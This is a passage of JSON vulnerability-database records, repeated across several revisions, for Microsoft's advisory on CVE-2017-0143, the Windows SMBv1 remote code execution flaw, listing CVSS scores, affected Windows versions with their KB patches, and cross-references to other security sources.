"kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:51:36", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T04:46:25", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3210721", "KB4012214", "KB3205401", "KB3210720", "KB4012212", "KB4012213", "KB4013198", "KB4012216", "KB3212646", "KB4012598", "KB4012215", "KB3177186", "KB4012606", "KB3213986", "KB3205409", "KB4013429", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:46:25", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T10:52:46", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4013198", "KB4012598", "KB4012606", "KB3210720", "KB3210721", "KB4012214", "KB3177186", "KB3212646", "KB4012216", "KB4012215", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB3205401", "KB4013429", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 